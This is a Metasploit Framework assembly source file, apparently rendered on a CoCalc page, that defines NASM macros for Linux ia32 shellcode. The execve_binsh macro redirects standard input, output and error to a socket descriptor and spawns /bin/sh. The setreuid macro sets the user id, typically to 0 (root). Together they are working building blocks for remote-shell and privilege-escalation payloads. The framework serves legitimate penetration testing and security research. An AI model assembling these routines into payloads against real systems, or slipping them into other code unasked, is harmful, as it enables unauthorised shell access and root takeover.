CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/linux/ia32/generic.asm
Views: 11784
1
;;

2
;

3
;        Name: generic

4
;        Type: Macro Set

5
;   Qualities: None

6
;     Authors: skape <mmiller [at] hick.org>

7
;     Version: $Revision: 1407 $

8
;     License: 

9
;

10
;        This file is part of the Metasploit Exploit Framework

11
;        and is subject to the same licenses and copyrights as

12
;        the rest of this package.

13
;

14
; Description:

15
;

16
;        This file provides a generic API of macros that can be used

17
;        by payloads.  No payloads are actually implemented within this

18
;        file.

19
;

20
; Macro List:

21
;

22
;        execve_binsh - Executes a command shell with flags

23
;        setreuid     - Set real/effective user id

24
;;

25
BITS 32

26


27
;;

28
; Define undefined assumptions

29
;;

30
%ifndef ASSUME_REG_EDX

31
%define ASSUME_REG_EDX -1

32
%endif

33
%ifndef ASSUME_REG_EAX

34
%define ASSUME_REG_EAX -1

35
%endif

36


37
;;

38
;     Macro: execve_binsh

39
;   Purpose: Execute a command shell with various options

40
; Arguments:

41
;

42
;    Execution flags: Flags used for executing the command shell in a 

43
;                     number of modes.

44
;

45
;        EXECUTE_REDIRECT_IO      => Redirects stdin/stdout/stderr to the fd

46
;                                    passed in 'edi'.

47
;        EXECUTE_DISABLE_READLINE => Disables readline support.  This is 

48
;                                    needed for redirection to UDP sockets.

49
;;

50
%define EXECUTE_REDIRECT_IO      0x0001

51
%define EXECUTE_DISABLE_READLINE 0x0002

52


53
%macro execve_binsh 1

54


55
	%if %1 & EXECUTE_REDIRECT_IO

56


57
dup:

58
%ifdef FD_REG_EBX

59
%else

60
	mov  ebx, edi

61
%endif

62
	push byte 0x2

63
	pop  ecx

64
dup_loop:

65
%if ASSUME_REG_EAX == 0

66
	mov  al, 0x3f

67
%else

68
	push byte 0x3f

69
	pop  eax

70
%endif

71
	int  0x80

72
	dec  ecx

73
	jns  dup_loop

74


75
	%endif

76


77
execve:

78
%if ASSUME_REG_EAX == 0

79
	mov  al, 0xb

80
%else

81
	push byte 0xb

82
	pop  eax

83
%endif

84
%if ASSUME_REG_EDX == 0

85
%else

86
	cdq

87
%endif

88
	push edx

89


90
	%if %1 & EXECUTE_DISABLE_READLINE

91


92
	push word 0x692d

93
	mov  ecx, esp

94
	push byte 0x67

95
	push word 0x6e69

96
	push dword 0x74696465

97
	push dword 0x6f6e2d2d

98
	mov  edi, esp

99
	push edx

100
	push dword 0x68732f2f

101
	push dword 0x6e69622f

102


103
	%else

104


105
	push dword 0x68732f2f

106
	push dword 0x6e69622f

107


108
	%endif

109


110
	mov  ebx, esp

111
	push edx

112


113
	%if %1 & EXECUTE_DISABLE_READLINE

114


115
	push ecx

116
	push edi

117


118
	%endif

119
	

120
	push ebx

121
	mov  ecx, esp

122
	int  0x80

123


124
%endmacro

125


126
;;

127
;     Macro: setreuid

128
;   Purpose: Set effective user id

129
; Arguments:

130
;

131
;    User ID: The user identifier to setreuid to, typically 0.

132
;;

133


134
%macro setreuid 1

135


136
setreuid:

137


138
	%if %1 == 0

139


140
	xor  ecx, ecx

141


142
	%else

143


144
		%if %1 < 256

145


146
		push byte %1

147


148
		%else

149


150
		push dword %1

151


152
		%endif

153


154
	pop  ecx

155


156
	%endif

157


158
	mov  ebx, ecx

159
	push byte 0x46

160
	pop  eax

161
	int  0x80

162


163
%endmacro

164


165